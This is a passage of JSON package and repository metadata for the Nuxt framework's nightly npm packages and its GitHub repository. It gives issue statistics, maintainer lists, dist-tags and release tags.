_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder-nightly/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder-nightly/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder-nightly/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder-nightly/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder-nightly/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder-nightly/codemeta","maintainers":[{"uuid":"nuxt.bot","login":"nuxt.bot","name":null,"email":"pyapar+nuxtbot@gmail.com","url":null,"packages_count":22,"html_url":"https://www.npmjs.com/~nuxt.bot","role":null,"created_at":"2023-10-14T09:55:37.050Z","updated_at":"2023-10-14T09:55:37.050Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxt.bot/packages"},{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2023-10-12T12:25:14.606Z","updated_at":"2023-10-12T12:25:14.606Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2023-10-12T12:25:14.520Z","updated_at":"2023-10-12T12:25:14.520Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2023-10-12T12:25:14.561Z","updated_at":"2023-10-12T12:25:14.561Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2023-10-12T12:25:14.689Z","updated_at":"2023-10-12T12:25:14.689Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"clarkdo","login":"clarkdo","name":null,"email":"clark.duxin@gmail.com","url":null,"packages_count":31,"html_url":"https://www.npmjs.com/~clarkdo","role":null,"created_at":"2023-10-12T12:25:14.647Z","updated_at":"2023-10-12T12:25:14.647Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/clarkdo/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-10-12T12:25:14.482Z","updated_at":"2023-10-12T12:25:14.482Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":7960660,"name":"nuxt-nightly","ecosystem":"npm","description":"Nuxt is a free and open-source framework with an intuitive and extendable way to create type-safe, performant and production-grade full-stack web applications and websites with Vue.js.","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":null,"versions_count":930,"first_release_published_at":"2023-07-20T11:37:32.551Z","latest_release_published_at":"2023-07-20T11:37:32.551Z","latest_release_number":"0.0.1","last_synced_at":"2026-03-19T22:03:38.270Z","created_at":"2023-07-20T11:40:07.024Z","updated_at":"2026-03-19T22:03:38.270Z","registry_url":"https://www.npmjs.com/package/nuxt-nightly","install_command":"npm install nuxt-nightly","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"pr-22649":"3.9.0-28354214.15a5e77d","pr-24010":"3.9.0-28378645.e9794ea0","pr-24787":"3.9.0-28378659.75a82c63","pr-24922":"3.10.0-28394973.15b95165","pr-24894":"3.10.0-28404855.4f7de5af","pr-23368":"3.10.0-28412264.57594fa2","pr-25210":"3.10.0-28422040.922a0429","pr-24960":"3.9.2-28423518.40bfb173","pr-25071":"3.10.0-28425618.d0e71656","pr-25770":"3.10.2-28463758.ae976d69","pr-26085":"3.11.0-28494221.a1f9ca9e","pr-25936":"3.11.0-28508900.dcd73d30","pr-26928":"3.12.0-28567604.d4b61ffd","pr-27037":"3.12.0-28577690.5048d11c","3x":"3.14.160-28864559.da7370df","latest":"4.0.0-28864692.67456810"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnu